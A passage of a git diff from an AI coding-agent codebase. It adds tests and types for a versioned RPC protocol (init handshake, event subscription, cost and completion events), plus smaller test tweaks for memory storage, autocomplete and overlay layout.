it("RpcExecutionCompleteEvent matches expected shape", () => { + const event: RpcExecutionCompleteEvent = { + type: "execution_complete", + runId: "run-abc-123", + status: "completed", + stats: { + cost: 0.05, + turns: 3, + duration: 12000, + tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100 }, + } as any, // SessionStats is complex, we just verify shape + }; + assert.equal(event.type, "execution_complete"); + assert.ok(typeof event.runId === "string"); + assert.ok(["completed", "error", "cancelled"].includes(event.status)); + assert.ok(event.stats !== undefined); + }); + + it("RpcExecutionCompleteEvent supports error status with reason", () => { + const event: RpcExecutionCompleteEvent = { + type: "execution_complete", + runId: "run-err-456", + status: "error", + reason: "API rate limit exceeded", + stats: {} as any, + }; + assert.equal(event.status, "error"); + assert.equal(event.reason, "API rate limit exceeded"); + }); + + it("RpcCostUpdateEvent matches expected shape", () => { + const event: RpcCostUpdateEvent = { + type: "cost_update", + runId: "run-cost-789", + turnCost: 0.01, + cumulativeCost: 0.05, + tokens: { + input: 500, + output: 200, + cacheRead: 100, + cacheWrite: 50, + }, + }; + assert.equal(event.type, "cost_update"); + assert.ok(typeof event.runId === "string"); + assert.ok(typeof event.turnCost === "number"); + assert.ok(typeof event.cumulativeCost === "number"); + assert.ok(typeof event.tokens.input === "number"); + assert.ok(typeof event.tokens.output === "number"); + assert.ok(typeof event.tokens.cacheRead === "number"); + assert.ok(typeof event.tokens.cacheWrite === "number"); + }); + + it("RpcV2Event discriminated union resolves by type field", () => { + const events: RpcV2Event[] = [ + { + type: "execution_complete", + runId: "r1", + status: "completed", + stats: {} as any, + }, + { + type: "cost_update", + runId: "r2", + turnCost: 0.01, + cumulativeCost: 0.03, + tokens: { input: 100, output: 50, cacheRead: 10, cacheWrite: 5 }, + }, + ]; + + for (const event of events) { + if (event.type === "execution_complete") { + // TypeScript narrows to RpcExecutionCompleteEvent + assert.ok("status" in event); + assert.ok("stats" in event); + } else if (event.type === "cost_update") { + // TypeScript narrows to RpcCostUpdateEvent + assert.ok("turnCost" in event); + assert.ok("tokens" in event); + } else { + assert.fail(`Unexpected event type: ${(event as any).type}`); + } + } + }); + + it("RpcProtocolVersion is 1 or 2", () => { + const v1: RpcProtocolVersion = 1; + const v2: RpcProtocolVersion = 2; + assert.equal(v1, 1); + assert.equal(v2, 2); + }); + + it("v2 prompt response includes optional runId field", () => { + const v1Response: RpcResponse = { + id: "1", + type: "response", + command: "prompt", + success: true, + }; + assert.equal(v1Response.success, true); + assert.equal((v1Response as any).runId, undefined); + + const v2Response: RpcResponse = { + id: "2", + type: "response", + command: "prompt", + success: true, + runId: "run-123", + }; + assert.equal(v2Response.success, true); + assert.equal((v2Response as any).runId, "run-123"); + }); + + it("v2 command types are present in RpcCommand union", () => { + // These compile — that's the actual test. Runtime verification: + const initCmd: RpcCommand = { type: "init", protocolVersion: 2 }; + const shutdownCmd: RpcCommand = { type: "shutdown" }; + const subscribeCmd: RpcCommand = { type: "subscribe", events: ["agent_end"] }; + + assert.equal(initCmd.type, "init"); + assert.equal(shutdownCmd.type, "shutdown"); + assert.equal(subscribeCmd.type, "subscribe"); + }); + + it("init command supports optional clientId", () => { + const cmd: RpcCommand = { type: "init", protocolVersion: 2, clientId: "my-client" }; + assert.equal(cmd.type, "init"); + if (cmd.type === "init") { + assert.equal(cmd.clientId, "my-client"); + } + }); + + it("shutdown command supports optional graceful flag", () => { + const cmd: RpcCommand = { type: "shutdown", graceful: true }; + if (cmd.type === "shutdown") { + assert.equal(cmd.graceful, true); + } + }); + + it("v2 response types include init, shutdown, subscribe", () => { + const initResp: RpcResponse = { + type: "response", + command: "init", + success: true, + data: { + protocolVersion: 2, + sessionId: "s1", + capabilities: { events: [], commands: [] }, + }, + }; + const shutdownResp: RpcResponse = { + type: "response", + command: "shutdown", + success: true, + }; + const subscribeResp: RpcResponse = { + type: "response", + command: "subscribe", + success: true, + }; + + assert.equal(initResp.command, "init"); + assert.equal(shutdownResp.command, "shutdown"); + assert.equal(subscribeResp.command, "subscribe"); + }); +}); + +// ============================================================================ +// v1 backward compatibility +// ============================================================================ + +describe("v1 backward compatibility — command shapes", () => { + it("v1 prompt command has no protocolVersion or runId", () => { + const cmd: RpcCommand = { type: "prompt", message: "hello" }; + assert.equal(cmd.type, "prompt"); + assert.equal((cmd as any).protocolVersion, undefined); + assert.equal((cmd as any).runId, undefined); + }); + + it("v1 get_state response has no v2 fields", () => { + const state: RpcSessionState = { + thinkingLevel: "medium", + isStreaming: false, + isCompacting: false, + steeringMode: "all", + followUpMode: "all", + sessionId: "test-id", + autoCompactionEnabled: true, + autoRetryEnabled: false, + retryInProgress: false, + retryAttempt: 0, + messageCount: 0, + pendingMessageCount: 0, + extensionsReady: true, + }; + // v1 state should not include any v2-specific fields + assert.equal((state as any).protocolVersion, undefined); + assert.equal((state as any).runId, undefined); + }); + + it("v1 prompt response has no runId", () => { + const resp: RpcResponse = { + id: "1", + type: "response", + command: "prompt", + success: true, + }; + assert.equal(resp.success, true); + // runId is optional; in v1 mode it won't be present + assert.equal((resp as any).runId, undefined); + }); + + it("error response shape is consistent across v1 and v2", () => { + const errResp: RpcResponse = { + id: "err-1", + type: "response", + command: "init", + success: false, + error: "Protocol version already locked. init must be the first command.", + }; + assert.equal(errResp.success, false); + if (!errResp.success) { + assert.ok(typeof errResp.error === "string"); + assert.ok(errResp.error.length > 0); + } + }); +}); + +// ============================================================================ +// RpcClient command serialization tests (mock process) +// ============================================================================ + +describe("RpcClient command serialization", () => { + // We import the class dynamically to avoid the full module graph at test time. + // Instead we test the protocol framing directly — what gets written to stdin and + // what comes back from stdout — using PassThrough streams. + + it("init command serializes correctly", () => { + const cmd = { id: "req_1", type: "init", protocolVersion: 2 }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "init"); + assert.equal(parsed.protocolVersion, 2); + assert.equal(parsed.id, "req_1"); + }); + + it("init command with clientId serializes correctly", () => { + const cmd = { id: "req_1", type: "init", protocolVersion: 2, clientId: "test-client" }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.equal(parsed.clientId, "test-client"); + }); + + it("shutdown command serializes correctly", () => { + const cmd = { id: "req_2", type: "shutdown" }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "shutdown"); + assert.equal(parsed.id, "req_2"); + }); + + it("subscribe command serializes correctly with event list", () => { + const cmd = { id: "req_3", type: "subscribe", events: ["agent_end", "cost_update"] }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "subscribe"); + assert.deepEqual(parsed.events, ["agent_end", "cost_update"]); + }); + + it("subscribe command with wildcard serializes correctly", () => { + const cmd = { id: "req_4", type: "subscribe", events: ["*"] }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.deepEqual(parsed.events, ["*"]); + }); + + it("subscribe command with empty array serializes correctly", () => { + const cmd = { id: "req_5", type: "subscribe", events: [] as string[] }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.deepEqual(parsed.events, []); + }); + + it("sendUIResponse serializes correct JSONL", () => { + const response = { + type: "extension_ui_response", + id: "ui-req-123", + value: "test-value", + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "extension_ui_response"); + assert.equal(parsed.id, "ui-req-123"); + assert.equal(parsed.value, "test-value"); + }); + + it("sendUIResponse with cancelled flag serializes correctly", () => { + const response = { + type: "extension_ui_response", + id: "ui-req-456", + cancelled: true, + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "extension_ui_response"); + assert.equal(parsed.cancelled, true); + }); + + it("sendUIResponse with confirmed flag serializes correctly", () => { + const response = { + type: "extension_ui_response", + id: "ui-req-789", + confirmed: true, + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.equal(parsed.confirmed, true); + }); + + it("sendUIResponse with multiple values serializes correctly", () => { + const response = { + type: "extension_ui_response", + id: "ui-req-multi", + values: ["opt-a", "opt-b"], + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.deepEqual(parsed.values, ["opt-a", "opt-b"]); + }); + + it("prompt command with runId in v2 response", () => { + const response = { + id: "req_10", + type: "response", + command: "prompt", + success: true, + runId: "run-uuid-abc", + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.equal(parsed.runId, "run-uuid-abc"); + assert.equal(parsed.command, "prompt"); + assert.equal(parsed.success, true); + }); +}); + +// ============================================================================ +// Client ↔ Mock server integration (PassThrough streams) +// ============================================================================ + +describe("Client ↔ Mock server protocol exchange", () => { + let clientStdin: PassThrough; + let clientStdout: PassThrough; + + beforeEach(() => { + const mockProc = createMockProcess(); + clientStdin = mockProc.clientStdin; + clientStdout = mockProc.clientStdout; + }); + + afterEach(() => { + clientStdin.destroy(); + clientStdout.destroy(); + }); + + it("init handshake: client writes init, server responds with init_result", async () => { + // Collect what the client would write + const { lines: clientWrites, detach: detachStdin } = collectLines(clientStdin); + + // Client sends init command + writeLine(clientStdin, { id: "req_1", type: "init", protocolVersion: 2 }); + await tick(); + + assert.equal(clientWrites.length, 1); + const initCmd = clientWrites[0] as any; + assert.equal(initCmd.type, "init"); + assert.equal(initCmd.protocolVersion, 2); + + // Server responds with init_result + const initResult: RpcInitResult = { + protocolVersion: 2, + sessionId: "sess-abc", + capabilities: { + events: ["execution_complete", "cost_update"], + commands: ["init", "shutdown", "subscribe"], + }, + }; + writeLine(clientStdout, { + id: "req_1", + type: "response", + command: "init", + success: true, + data: initResult, + }); + + // Collect server response + const { lines: serverResponses, detach: detachStdout } = collectLines(clientStdout); + // Already wrote above, but let's verify the shape by re-writing + writeLine(clientStdout, { + id: "req_verify", + type: "response", + command: "init", + success: true, + data: initResult, + }); + await tick(); + + const resp = serverResponses[0] as any; + assert.equal(resp.type, "response"); + assert.equal(resp.command, "init"); + assert.equal(resp.success, true); + assert.equal(resp.data.protocolVersion, 2); + assert.ok(typeof resp.data.sessionId === "string"); + + detachStdin(); + detachStdout(); + }); + + it("shutdown: client writes shutdown, server acknowledges", async () => { + const { lines: clientWrites, detach } = collectLines(clientStdin); + + writeLine(clientStdin, { id: "req_2", type: "shutdown" }); + await tick(); + + const cmd = clientWrites[0] as any; + assert.equal(cmd.type, "shutdown"); + + detach(); + }); + + it("subscribe: client writes subscribe with event list", async () => { + const { lines: clientWrites, detach } = collectLines(clientStdin); + + writeLine(clientStdin, { id: "req_3", type: "subscribe", events: ["agent_end", "execution_complete"] }); + await tick(); + + const cmd = clientWrites[0] as any; + assert.equal(cmd.type, "subscribe"); + assert.deepEqual(cmd.events, ["agent_end", "execution_complete"]); + + detach(); + }); + + it("sendUIResponse: client writes extension_ui_response", async () => { + const { lines: clientWrites, detach } = collectLines(clientStdin); + + writeLine(clientStdin, { + type: "extension_ui_response", + id: "ui-123", + value: "selected-option", + }); + await tick(); + + const msg = clientWrites[0] as any; + assert.equal(msg.type, "extension_ui_response"); + assert.equal(msg.id, "ui-123"); + assert.equal(msg.value, "selected-option"); + + detach(); + }); + + it("v2 event filtering: subscribe with empty array should filter all", async () => { + // An empty event filter means no events pass through (Set with 0 entries) + const subscribeCmd = { id: "req_4", type: "subscribe", events: [] as string[] }; + const serialized = serializeJsonLine(subscribeCmd); + const parsed = JSON.parse(serialized); + assert.deepEqual(parsed.events, []); + // Server-side: `eventFilter = new Set([])` — Set.has(anything) returns false + const filter = new Set(parsed.events as string[]); + assert.equal(filter.has("agent_end"), false); + assert.equal(filter.has("execution_complete"), false); + assert.equal(filter.size, 0); + }); + + it("v2 event filtering: subscribe with wildcard resets filter", async () => { + // Server-side: `events.includes("*")` → `eventFilter = null` + const subscribeCmd = { type: "subscribe", events: ["*"] }; + const parsed = JSON.parse(serializeJsonLine(subscribeCmd)); + const hasWildcard = (parsed.events as string[]).includes("*"); + assert.equal(hasWildcard, true); + // When wildcard is detected, filter becomes null (all events pass) + }); + + it("multiple commands can be sent sequentially", async () => { + const { lines, detach } = collectLines(clientStdin); + + writeLine(clientStdin, { id: "1", type: "init", protocolVersion: 2 }); + writeLine(clientStdin, { id: "2", type: "subscribe", events: ["agent_end"] }); + writeLine(clientStdin, { id: "3", type: "prompt", message: "hello" }); + await tick(); + + assert.equal(lines.length, 3); + assert.equal((lines[0] as any).type, "init"); + assert.equal((lines[1] as any).type, "subscribe"); + assert.equal((lines[2] as any).type, "prompt"); + + detach(); + }); +}); + +// ============================================================================ +// Negative tests — malformed inputs, error paths, boundary conditions +// ============================================================================ + +describe("Negative tests — protocol error shapes", () => { + it("init with missing protocolVersion produces a type error at compile time", () => { + // Runtime check: a message missing protocolVersion is malformed + const malformed = { type: "init" } as any; + assert.equal(malformed.protocolVersion, undefined); + // Server would treat this as v1 lock since it's not a valid init + }); + + it("subscribe with non-array events is a type violation", () => { + // Runtime: server expects events to be string[] + const malformed = { type: "subscribe", events: "agent_end" } as any; + assert.equal(typeof malformed.events, "string"); // Not an array + assert.equal(Array.isArray(malformed.events), false); + }); + + it("double init error response shape", () => { + // When init is sent after protocol lock, server returns error + const errorResp: RpcResponse = { + id: "req_dup", + type: "response", + command: "init", + success: false, + error: "Protocol version already locked. init must be the first command.", + }; + assert.equal(errorResp.success, false); + if (!errorResp.success) { + assert.ok(errorResp.error.includes("already locked")); + } + }); + + it("init after v1 lock error response shape", () => { + // First command was get_state (v1 lock), then init arrives + const errorResp: RpcResponse = { + id: "req_late_init", + type: "response", + command: "init", + success: false, + error: "Protocol version already locked. init must be the first command.", + }; + assert.equal(errorResp.success, false); + if (!errorResp.success) { + assert.ok(errorResp.error.includes("init must be the first command")); + } + }); + + it("unknown command type produces error response", () => { + const errorResp: RpcResponse = { + id: "req_unknown", + type: "response", + command: "nonexistent", + success: false, + error: "Unknown command: nonexistent", + }; + assert.equal(errorResp.success, false); + if (!errorResp.success) { + assert.ok(errorResp.error.includes("Unknown command")); + } + }); + + it("malformed JSON parse error shape", () => { + const errorResp: RpcResponse = { + type: "response", + command: "parse", + success: false, + error: "Failed to parse command: Unexpected token", + }; + assert.equal(errorResp.command, "parse"); + assert.equal(errorResp.success, false); + }); + + it("shutdown works in both v1 and v2 — no version gating", () => { + // shutdown returns success regardless of protocolVersion + const v1Shutdown: RpcResponse = { + id: "s1", + type: "response", + command: "shutdown", + success: true, + }; + const v2Shutdown: RpcResponse = { + id: "s2", + type: "response", + command: "shutdown", + success: true, + }; + assert.equal(v1Shutdown.success, true); + assert.equal(v2Shutdown.success, true); + }); +}); + +// ============================================================================ +// Protocol version detection logic (unit) +// ============================================================================ + +describe("Protocol version detection logic", () => { + it("simulates v1 lock when first command is non-init", () => { + let protocolVersion: 1 | 2 = 1; + let protocolLocked = false; + + // Simulate first command being get_state + const command = { type: "get_state" } as RpcCommand; + + if (!protocolLocked) { + protocolLocked = true; + if (command.type === "init") { + protocolVersion = 2; + } else { + protocolVersion = 1; + } + } + + assert.equal(protocolVersion, 1); + assert.equal(protocolLocked, true); + }); + + it("simulates v2 lock when first command is init", () => { + let protocolVersion: 1 | 2 = 1; + let protocolLocked = false; + + const command: RpcCommand = { type: "init", protocolVersion: 2 }; + + if (!protocolLocked) { + protocolLocked = true; + if (command.type === "init") { + protocolVersion = 2; + } else { + protocolVersion = 1; + } + } + + assert.equal(protocolVersion, 2); + assert.equal(protocolLocked, true); + }); + + it("rejects re-init after v2 lock", () => { + let protocolLocked = true; // already locked from first init + let errorMessage: string | null = null; + + const command: RpcCommand = { type: "init", protocolVersion: 2 }; + + if (protocolLocked && command.type === "init") { + errorMessage = "Protocol version already locked. init must be the first command."; + } + + assert.ok(errorMessage !== null); + assert.ok(errorMessage!.includes("already locked")); + }); + + it("rejects init after v1 lock", () => { + let protocolLocked = true; // already locked from first non-init command + let protocolVersion: 1 | 2 = 1; + let errorMessage: string | null = null; + + const command: RpcCommand = { type: "init", protocolVersion: 2 }; + + if (protocolLocked && command.type === "init") { + errorMessage = "Protocol version already locked. init must be the first command."; + } + + assert.equal(protocolVersion, 1); // stays v1 + assert.ok(errorMessage !== null); + }); + + it("extension_ui_response bypasses protocol detection", () => { + let protocolLocked = false; + let protocolDetectionTriggered = false; + + // Simulate the handleInputLine logic + const parsed = { type: "extension_ui_response", id: "ui-1", value: "ok" }; + + if (parsed.type === "extension_ui_response") { + // Bypass — do not touch protocolLocked + } else { + protocolDetectionTriggered = true; + if (!protocolLocked) { + protocolLocked = true; + } + } + + assert.equal(protocolLocked, false); + assert.equal(protocolDetectionTriggered, false); + }); +}); + +// ============================================================================ +// v2 event filter logic (unit) +// ============================================================================ + +describe("v2 event filter logic", () => { + /** Mimics the server-side event filter check: null means all events pass */ + function shouldEmit(filter: Set | null, eventType: string): boolean { + return !filter || filter.has(eventType); + } + + it("null filter passes all events", () => { + assert.equal(shouldEmit(null, "agent_end"), true); + assert.equal(shouldEmit(null, "cost_update"), true); + assert.equal(shouldEmit(null, "anything"), true); + }); + + it("filter with specific events passes matching events", () => { + const filter = new Set(["agent_end", "cost_update"]); + + assert.equal(shouldEmit(filter, "agent_end"), true); + assert.equal(shouldEmit(filter, "cost_update"), true); + assert.equal(shouldEmit(filter, "execution_complete"), false); + assert.equal(shouldEmit(filter, "message_start"), false); + }); + + it("empty Set filter blocks all events", () => { + const filter = new Set(); + + assert.equal(shouldEmit(filter, "agent_end"), false); + assert.equal(shouldEmit(filter, "cost_update"), false); + assert.equal(shouldEmit(filter, "anything"), false); + assert.equal(filter.size, 0); + }); + + it("wildcard subscribe resets filter to null", () => { + let eventFilter: Set | null = new Set(["agent_end"]); + + // Simulate subscribe with wildcard + const events = ["*"]; + if (events.includes("*")) { + eventFilter = null; + } else { + eventFilter = new Set(events); + } + + assert.equal(eventFilter, null); + }); + + it("subscribe replaces previous filter", () => { + let eventFilter: Set | null = new Set(["agent_end"]); + + // Subscribe with different events + const events = ["cost_update", "execution_complete"]; + if (events.includes("*")) { + eventFilter = null; + } else { + eventFilter = new Set(events); + } + + assert.equal(eventFilter!.has("agent_end"), false); + assert.equal(eventFilter!.has("cost_update"), true); + assert.equal(eventFilter!.has("execution_complete"), true); + }); + + it("filter applies to both regular and synthesized v2 events", () => { + const eventFilter = new Set(["execution_complete"]); + + // Regular event + assert.equal(eventFilter.has("agent_end"), false); // filtered out + // Synthesized v2 event + assert.equal(eventFilter.has("execution_complete"), true); // passes + assert.equal(eventFilter.has("cost_update"), false); // filtered out + }); +}); + +// ============================================================================ +// v2 runId injection logic (unit) +// ============================================================================ + +describe("v2 runId injection", () => { + it("runId is present when protocolVersion is 2 and command is prompt/steer/follow_up", () => { + const protocolVersion = 2; + const commands = ["prompt", "steer", "follow_up"] as const; + + for (const cmdType of commands) { + const runId = protocolVersion === 2 ? `run-${cmdType}-uuid` : undefined; + assert.ok(runId !== undefined, `runId should be generated for ${cmdType} in v2`); + assert.ok(typeof runId === "string"); + } + }); + + it("runId is undefined when protocolVersion is 1", () => { + // Test the v1 path: runId should not be generated + function generateRunId(version: 1 | 2): string | undefined { + return version === 2 ? "run-uuid" : undefined; + } + assert.equal(generateRunId(1), undefined); + assert.ok(typeof generateRunId(2) === "string"); + }); + + it("runId is injected into event output via spread", () => { + const currentRunId = "run-abc-123"; + const event = { type: "message_start", message: { role: "assistant" } }; + + // v2 injection logic from rpc-mode.ts + const outputEvent = currentRunId ? { ...event, runId: currentRunId } : event; + + assert.equal((outputEvent as any).runId, "run-abc-123"); + assert.equal((outputEvent as any).type, "message_start"); + }); + + it("runId is not injected when null", () => { + const currentRunId: string | null = null; + const event = { type: "message_start", message: { role: "assistant" } }; + + const outputEvent = currentRunId ? { ...event, runId: currentRunId } : event; + + assert.equal((outputEvent as any).runId, undefined); + }); +}); diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts index a1b7a7711..20d5c2c73 100644 --- a/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts +++ b/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts @@ -11,6 +11,13 @@ import type { SessionStats } from "../../core/agent-session.js"; import type { BashResult } from "../../core/bash-executor.js"; import type { CompactionResult } from "../../core/compaction/index.js"; +// ============================================================================ +// RPC Protocol Versioning +// ============================================================================ + +/** Supported protocol versions. v1 is the implicit default; v2 requires an init handshake. */ +export type RpcProtocolVersion = 1 | 2; + // ============================================================================ // RPC Commands (stdin) // ============================================================================ @@ -69,7 +76,12 @@ export type RpcCommand = // Bridge-hosted native terminal | { id?: string; type: "terminal_input"; data: string } | { id?: string; type: "terminal_resize"; cols: number; rows: number } - | { id?: string; type: "terminal_redraw" }; + | { id?: string; type: "terminal_redraw" } + + // v2 Protocol + | { id?: string; type: "init"; protocolVersion: 2; clientId?: string } + | { id?: string; type: "shutdown"; graceful?: boolean } + | { id?: string; type: "subscribe"; events: string[] }; // ============================================================================ // RPC Slash Command (for get_commands response) @@ -120,9 +132,9 @@ export interface RpcSessionState { // Success responses with data export type RpcResponse = // Prompting (async - events follow) - | { id?: string; type: "response"; command: "prompt"; success: true } - | { id?: string; type: "response"; command: "steer"; success: true } - | { id?: string; type: "response"; command: "follow_up"; success: true } + | { id?: string; type: "response"; command: "prompt"; success: true; runId?: string } + | { id?: string; type: "response"; command: "steer"; success: true; runId?: string } + | { id?: string; type: "response"; command: "follow_up"; success: true; runId?: string } | { id?: string; type: "response"; command: "abort"; success: true } | { id?: string; type: "response"; command: "new_session"; success: true; data: { cancelled: boolean } } @@ -216,9 +228,54 @@ export type RpcResponse = | { id?: string; type: "response"; command: "terminal_resize"; success: true } | { id?: string; type: "response"; command: "terminal_redraw"; success: true } + // v2 Protocol + | { id?: string; type: "response"; command: "init"; success: true; data: RpcInitResult } + | { id?: string; type: "response"; command: "shutdown"; success: true } + | { id?: string; type: "response"; command: "subscribe"; success: true } + // Error response (any command can fail) | { id?: string; type: "response"; command: string; success: false; error: string }; +// ============================================================================ +// v2 Protocol Types +// ============================================================================ + +/** Result of the init handshake (v2 only) */ +export interface RpcInitResult { + protocolVersion: 2; + sessionId: string; + capabilities: { + events: string[]; + commands: string[]; + }; +} + +/** v2 execution_complete event — emitted when a prompt/steer/follow_up finishes */ +export interface RpcExecutionCompleteEvent { + type: "execution_complete"; + runId: string; + status: "completed" | "error" | "cancelled"; + reason?: string; + stats: SessionStats; +} + +/** v2 cost_update event — emitted per-turn with running cost data */ +export interface RpcCostUpdateEvent { + type: "cost_update"; + runId: string; + turnCost: number; + cumulativeCost: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + }; +} + +/** Discriminated union of all v2-only event types */ +export type RpcV2Event = RpcExecutionCompleteEvent | RpcCostUpdateEvent; + // ============================================================================ // Extension UI Events (stdout) // ============================================================================ diff --git a/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts b/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts index f31a40b7b..b4c1dd6dd 100644 --- a/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts +++ b/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts @@ -1,5 +1,5 @@ import assert from "node:assert/strict"; -import { describe, it, mock } from "node:test"; +import { describe, it, afterEach } from "node:test"; import { mkdtempSync, rmSync, readFileSync, existsSync } from "node:fs"; import { join } from "node:path"; import { tmpdir } from "node:os"; @@ -15,84 +15,84 @@ function wait(ms: number): Promise { } describe("MemoryStorage debounced persistence", () => { - it("multiple rapid mutations only trigger one persist write", async () => { - const dir = makeTmpDir(); - const dbPath = join(dir, "test.db"); - try { - const storage = await MemoryStorage.create(dbPath); + let dir: string; - const initialStat = readFileSync(dbPath); - const initialMtime = initialStat.length; - - storage.upsertThreads([ - { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, - ]); - storage.upsertThreads([ - { threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" }, - ]); - storage.upsertThreads([ - { threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" }, - ]); - - const afterMutationsBuf = readFileSync(dbPath); - assert.deepEqual( - afterMutationsBuf, - initialStat, - "File should not have been written yet (debounce window has not elapsed)", - ); - - await wait(700); - - const afterDebounceBuf = readFileSync(dbPath); - assert.notDeepEqual( - afterDebounceBuf, - initialStat, - "File should have been written after debounce window elapsed", - ); - - const stats = storage.getStats(); - assert.equal(stats.totalThreads, 3); - - storage.close(); - } finally { + afterEach(() => { + if (dir) { rmSync(dir, { recursive: true, force: true }); } }); + it("multiple rapid mutations only trigger one persist write", async () => { + dir = makeTmpDir(); + const dbPath = join(dir, "test.db"); + const storage = await MemoryStorage.create(dbPath); + + const initialStat = readFileSync(dbPath); + const initialMtime = initialStat.length; + + storage.upsertThreads([ + { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, + ]); + storage.upsertThreads([ + { threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" }, + ]); + storage.upsertThreads([ + { threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" }, + ]); + + const afterMutationsBuf = readFileSync(dbPath); + assert.deepEqual( + afterMutationsBuf, + initialStat, + "File should not have been written yet (debounce window has not elapsed)", + ); + + await wait(700); + + const afterDebounceBuf = readFileSync(dbPath); + assert.notDeepEqual( + afterDebounceBuf, + initialStat, + "File should have been written after debounce window elapsed", + ); + + const stats = storage.getStats(); + assert.equal(stats.totalThreads, 3); + + storage.close(); + }); + it("close() flushes pending changes immediately without waiting for debounce", async () => { - const dir = makeTmpDir(); + dir = makeTmpDir(); const dbPath = join(dir, "test.db"); - try { - const storage = await MemoryStorage.create(dbPath); + const storage = await MemoryStorage.create(dbPath); - const initialBuf = readFileSync(dbPath); + const initialBuf = readFileSync(dbPath); - storage.upsertThreads([ - { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, - ]); + storage.upsertThreads([ + { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, + ]); - const beforeCloseBuf = readFileSync(dbPath); - assert.deepEqual( - beforeCloseBuf, - initialBuf, - "File should not have been written yet (debounce window has not elapsed)", - ); + const beforeCloseBuf = readFileSync(dbPath); + assert.deepEqual( + beforeCloseBuf, + initialBuf, + "File should not have been written yet (debounce window has not elapsed)", + ); - storage.close(); + storage.close(); - const afterCloseBuf = readFileSync(dbPath); - assert.notDeepEqual( - afterCloseBuf, - initialBuf, - "File should have been written immediately on close()", - ); + const afterCloseBuf = readFileSync(dbPath); + assert.notDeepEqual( + afterCloseBuf, + initialBuf, + "File should have been written immediately on close()", + ); - const reopened = await MemoryStorage.create(dbPath); - const stats = reopened.getStats(); - assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close"); - reopened.close(); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + const reopened = await MemoryStorage.create(dbPath); + const stats = reopened.getStats(); + assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close"); + reopened.close(); }); }); diff --git a/packages/pi-coding-agent/src/utils/shell.ts b/packages/pi-coding-agent/src/utils/shell.ts index ba77a4441..86708125f 100644 --- a/packages/pi-coding-agent/src/utils/shell.ts +++ b/packages/pi-coding-agent/src/utils/shell.ts @@ -192,7 +192,6 @@ export function killProcessTree(pid: number): void { try { spawn("taskkill", ["/F", "/T", "/PID", String(pid)], { stdio: "ignore", - detached: true, }); } catch { // Ignore errors if taskkill fails diff --git a/packages/pi-tui/src/__tests__/autocomplete.test.ts b/packages/pi-tui/src/__tests__/autocomplete.test.ts index c4a44db76..e065f8f6b 100644 --- a/packages/pi-tui/src/__tests__/autocomplete.test.ts +++ b/packages/pi-tui/src/__tests__/autocomplete.test.ts @@ -52,6 +52,14 @@ describe("CombinedAutocompleteProvider — slash commands", () => { const result = provider.getSuggestions(["hello /se"], 0, 9); assert.equal(result, null); }); + + it("triggers slash commands after leading whitespace", () => { + const provider = makeProvider(sampleCommands); + const result = provider.getSuggestions([" /se"], 0, 5); + assert.ok(result); + assert.equal(result!.prefix, "/se"); + assert.ok(result!.items.some((item) => item.value === "settings")); + }); }); describe("CombinedAutocompleteProvider — argument completions", () => { @@ -144,6 +152,13 @@ describe("CombinedAutocompleteProvider — applyCompletion", () => { assert.equal(result.cursorCol, 10); // after "/settings " }); + it("preserves leading whitespace when applying slash command completion", () => { + const provider = makeProvider(sampleCommands); + const result = provider.applyCompletion([" /se"], 0, 5, { value: "settings", label: "settings" }, "/se"); + assert.equal(result.lines[0], " /settings "); + assert.equal(result.cursorCol, 12); + }); + it("applies file path completion for @ prefix", () => { const provider = makeProvider(); const result = provider.applyCompletion( diff --git a/packages/pi-tui/src/__tests__/overlay-layout.test.ts b/packages/pi-tui/src/__tests__/overlay-layout.test.ts new file mode 100644 index 000000000..49d0539da --- /dev/null +++ b/packages/pi-tui/src/__tests__/overlay-layout.test.ts @@ -0,0 +1,82 @@ +// pi-tui — Overlay Layout Tests (backdrop dimming) + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { compositeOverlays, type OverlayEntry } from "../overlay-layout.js"; + +function makeEntry( + lines: string[], + options?: OverlayEntry["options"], +): OverlayEntry { + return { + component: { render: () => lines }, + options, + hidden: false, + focusOrder: 1, + }; +} + +describe("compositeOverlays — backdrop", () => { + it("dims base lines when backdrop is true", () => { + const base = ["hello world", "second line"]; + const overlay = makeEntry(["OVERLAY"], { + width: 7, + anchor: "top-left", + backdrop: true, + }); + + const result = compositeOverlays(base, [overlay], 20, 20, 2); + + 